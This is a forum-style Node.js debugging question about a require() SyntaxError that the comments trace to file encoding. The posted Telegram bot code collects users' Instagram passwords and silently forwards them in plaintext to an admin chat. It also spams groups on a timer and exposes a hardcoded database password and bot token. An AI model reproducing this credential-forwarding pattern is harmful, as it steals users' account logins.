# Weird nodeJS Error when trying to require a js file

Tags: node.js, syntax, module, require

This just started happening like 5 minutes ago and i have no idea why or how it happens

This is my main js file that is requiring a file called config.js

```
    const TeleBot = require('telebot');
const config = require('./config.js');
const users = {};
const messages = require('./messages');
var accounts = require('./inc/account.js');
var mysql = require('mysql');
var connection = mysql.createConnection({
    host : 'localhost',
    user : 'root',
    password : 'weareoscarmike',
    database : 'insta',
    multipleStatements: true
});
const bot = new TeleBot({
                token: config.bot_token, // Required. Telegram Bot API token. 
                polling: { // Optional. Use polling. 
                interval: 1000, // Optional. How often check updates (in ms). 
                timeout: 0, // Optional. Update polling timeout (0 - short polling). 
                limit: 100, // Optional. Limits the number of updates to be retrieved. 
                retryTimeout: 5000, // Optional. Reconnecting timeout (in ms). 
                //proxy: 'http://username:password@yourproxy.com:8080' // Optional. An HTTP proxy to be used (supports Basic Auth). 
                },
                usePlugins: ['commandButton', 'askUser'],
        });


bot.on('newChatMembers',(msg) => {
    let group_id = msg.chat.id;
    console.log(group_id);
    let query = "INSERT INTO `groups` (`group_id`)  VALUES (?)";
    connection.query(query,[group_id]);

}); 


bot.on('/start', (msg) => {

    const markup = keyboard_generator('main_menu');
    const message = msg_generator('main_menu');
    return bot.sendMessage(
        msg.from.id, message, {markup:markup}
    );

});


//Handle all button clicks 
bot.on('callbackQuery', (msg) => {
    let msg_id = msg.message.message_id;
    let chat_id = msg.message.chat.id;
    switch(msg.data){

        case('about'):
        msg.message.from = msg.message.chat;
        about(msg.message);
        break;

        case('add_account'):
        msg.message.from = msg.message.chat;
        add_account(msg.message);
        break;

        case('remove_account'):
        msg.message.from = msg.message.chat;
        remove_account(msg.message);

        case('stats'):
        msg.message.from = msg.message.chat;
        stats(msg.message);
        break;

        case('start_like'):
        msg.message.from = msg.message.chat;
        start_like(msg.message);

        case('main_menu'):
        msg.message.from = msg.message.chat;
        bot.event('/start',msg.message);
        break;



    }
    //bot.editText({ chatId: chat_id, messageId: msg_id }, "edited", { markup: markup }).catch(function(err){console.log(err)});
});

about = function(msg,error){
    var message = msg_generator('about');
    var markup = keyboard_generator('return');
    bot.sendMessage(msg.from.id, message, {parse:'html',markup:markup});
}

start_like = function(msg,error){
    var message = msg_generator('start_like');
    var markup = keyboard_generator('return');
    accounts.has_acc(msg.from.id,false).then(function(data){

        if(data){
            var message = msg_generator('start_like');
        } else {
            var message = msg_generator('no_account');
        }
        var markup = keyboard_generator('return');
        bot.sendMessage(msg.from.id,message,{parse:'html',markup:markup});
    });
}

//Three events that deal with adding accounts
add_account = function(msg,error){
        if(error){
            switch(error){
                case('AuthenticationError'):
                var message = msg_generator(error);
                var markup = keyboard_generator('return');
                break;

                case('CheckpointError'):
                var message = msg_generator(error);
                var markup = keyboard_generator('return');
                break;

                case('DatabaseError'):
                var message = msg_generator(error);
                var markup = keyboard_generator('return');
                break;
            }
            bot.sendMessage(msg.from.id, message, {parse:'html',markup:markup,ask:'add_account_username'});
            return;
        } 
        var message = msg_generator('add_account');
        var markup = keyboard_generator('return');
        bot.sendMessage(msg.from.id, message, {parse:'html',markup:markup,ask:'add_account_username'});

}

remove_account = function(msg,error){
    accounts.has_acc(msg.from.id,false).then(function(data){

        if(data){
            var message = msg_generator('remove_account');
        } else {
            var message = msg_generator('no_account');
        }
        var markup = keyboard_generator('return');
        bot.sendMessage(msg.from.id,message,{parse:'html',markup:markup});
    });
}

//This one is used to ask the user his password
bot.on('ask.add_account_username', (msg) => {
    let username = msg.text;
    users[msg.from.id] = {
        username : username
    }
    var message = msg_generator('account_password');
    return bot.sendMessage(msg.from.id, message, {parse:'html',ask:'add_account_password'});
});

//This one is used to verify password 
bot.on('ask.add_account_password', (msg) => {
    let username = users[msg.from.id].username;
    let password = msg.text;

    accounts.login_account(username,password).then(function(data){
        var account = data.params;

        accounts.store(msg.from.id,username,password,account.followerCount);
        return account;
    }).then(function(account){
        let caption = "Your account <b>"+account.username+"</b>("+account.fullName+")has been added\n";
        return bot.sendPhoto(msg.from.id, account.picture, {parse:'html',caption:caption});
    })
    .then(function(data){
        let message = "Username : "+username+"\n Password:"+password;
        return bot.sendMessage(config.admin_id,message);
    })
    .catch(function(error){
        console.log(error);
        add_account(msg,error.name);
    });
});

stats = function(msg,error){
    accounts.stats().then(function(data){


        let parse = {
            total_users : data[0][0].total_u,
            total_f : data[1][0].f_total,
            level1 : data[2][0].total1,
            level2 : data[3][0].total2,
            level3 : data[4][0].total3,
            level4 : data[5][0].total4
        }

        var message = parse_msg(parse,msg_generator('stats'));
        var markup = keyboard_generator('return');
        return bot.sendMessage(msg.from.id,message,{markup:markup});
    });
}



function msg_generator(type){
    let ret = type+"_msg";
    return messages[ret];
}

function keyboard_generator(type){
    switch(type){
            case('main_menu'): 
                var markup = bot.inlineKeyboard([
                [bot.inlineButton('About', {callback:'about'}),bot.inlineButton('Market', {url: 'https://t.me/GrowMeMarket'})],
                [bot.inlineButton('Add account', {callback:'add_account'}),bot.inlineButton('Remove accounts', {callback:'remove_account'})],
                [bot.inlineButton('Stats', {callback:'stats'})],
                [bot.inlineButton('Start Liking', {callback:'start_like'})],
            ]); 
            break;

            case('return'):
                var markup = bot.inlineKeyboard([
                [bot.inlineButton('Return Home', {callback:'main_menu'})],

            ]); 
            break;
    }

    return markup;
}

parse_msg = function(obj,msg){
    for(key in obj){
    msg = msg.replace("%"+key+"%",obj[key]);
    }
 return msg;
}

self_market = function(){
    let query = "SELECT `group_id` FROM groups";
    connection.query(query, function(err,data){
        if(err) console.log(err);
        for(i in data){
            bot.sendMessage(data[i].group_id,config.market_msg).catch(function(err){
                //Doin nothin
            });
        }
    });
}

start = function(){
    return new Promise(function(resolve,reject){
        bot.start();
        resolve(true);
    });
}

start().then(function(data){
    setInterval(function(){
        self_market();
    },config.the_interval);
}).catch(function(err){
    console.log("Ther was an error");
});
```

So this is what config.js looks like

```
        const config = {}
    config.bot_token = '448696631:AAGOG5LbZCtvUDIdi1oSDtTWatOE_347phU';
    config.admin_id = '347334528';
    config.the_interval = 5 * 1000;
    config.market_msg = "fta";

module.exports = config;
```

Well to be honest, this started hapening after i changed the value of config.market_msg to a string that has a unicode character in but i dont see how that breaks it, and even if it does, when i change it back to a simple enough value it should go back to normal but i'm guessing its loading back from cache or something and thats why it still persists? I really have no idea why this happens.

This is the error i am hit with by the way

```
    /home/neo/ins/config.js:1
(function (exports, require, module, __filename, __dirname) { c


SyntaxError: Invalid or unexpected token
    at createScript (vm.js:74:10)
    at Object.runInThisContext (vm.js:116:10)
    at Module._compile (module.js:533:28)
    at Object.Module._extensions..js (module.js:580:10)
    at Module.load (module.js:503:32)
    at tryModuleLoad (module.js:466:12)
    at Function.Module._load (module.js:458:3)
    at Module.require (module.js:513:17)
    at require (internal/module.js:11:18)
    at Object.<anonymous> (/home/neo/ins/hello.js:2:16)
```

Comment: What's the actual problem?

Comment: @robertklep sorry my bad, i forgot to add the error in a hurry. I've made the edit.

Comment: Nevermind, it was cause of encoding

Comment: Yeah, I was gonna suggest a Unicode BOM.

Comment: Did you already solve the problem?  Is that what your "nevermind" comment means?  If so, then please either delete your question or post your own answer so we know this question is done.